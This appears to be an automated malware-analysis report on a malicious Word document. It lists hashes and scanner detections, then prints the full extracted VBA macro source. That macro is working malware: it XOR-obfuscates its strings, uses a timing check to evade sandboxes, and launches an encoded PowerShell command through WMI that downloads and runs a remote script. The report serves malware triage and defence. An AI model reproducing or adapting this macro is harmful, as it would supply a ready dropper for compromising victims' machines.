Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 caa9c98fc439418a…

MALICIOUS

Office (OLE) / .DOC

32.5 KB Created: 2026-03-20 13:34:00 Authoring application: Microsoft Office Word First seen: 2026-06-11
MD5: 011401d0e0b7820aa55a617b729eef7d SHA-1: 1ba92af4027385a7aa69bd8908ff1ab2a2cf673f SHA-256: caa9c98fc439418af1a3b17ac7ff5fefbafdd3300d08aba36605d32b7bd6e71d
124 Risk Score

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-10009612-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-10009612-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        GetObject(Nuts("029003004007013007030025080")).Get(Nuts("061003004089088053058024005009015025025")).Create Water, Tea, Coffee, Napkin
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1817 bytes
SHA-256: 26ea4f23e9ff7dff053208c89626551f04b6e48b91f0b3e8a38c3a3b58fa61b3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function Pears(Beets)
    Pears = Chr(Beets Xor 106)
End Function

Function Strawberries(Grapes)
    Strawberries = Left(Grapes, 3)
End Function

Function Almonds(Jelly)
    Almonds = Right(Jelly, Len(Jelly) - 3)
End Function

Function Nuts(Milk)
    Do
    Oatmilk = Oatmilk + Pears(Strawberries(Milk))
    Milk = Almonds(Milk)
    Loop While Len(Milk) > 0
    Nuts = Oatmilk
End Function

Public Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long

Function MyMacro()
    Dim Apples As String
    Dim Water As String
    Dim t1 As Date
    Dim t2 As Date
    Dim time As Long

    t1 = Now()
    Sleep (2000)
    t2 = Now()
    time = DateDiff("s", t1, t2)

    If time < 2 Then
        Exit Function
    End If
    
    If ActiveDocument.Name <> Nuts("029005024014012003006015068014005009") Then
      MsgBox (ActiveDocument.Name)
      Exit Function
    End If
    
    Apples = "026005029015024025002015006006074071015018015009074008019026011025025074071004005026074071009074003015018066066004015029071005008000015009030074025019025030015007068004015030068029015008009006003015004030067068014005029004006005011014025030024003004013066077002030030026080069069091083088068091092082068094095068091092082069057002015006006088068026025091077067067"
    Water = Nuts(Apples)
    GetObject(Nuts("029003004007013007030025080")).Get(Nuts("061003004089088053058024005009015025025")).Create Water, Tea, Coffee, Napkin

End Function

Open this report in the interactive analyzer, or submit your own file for analysis.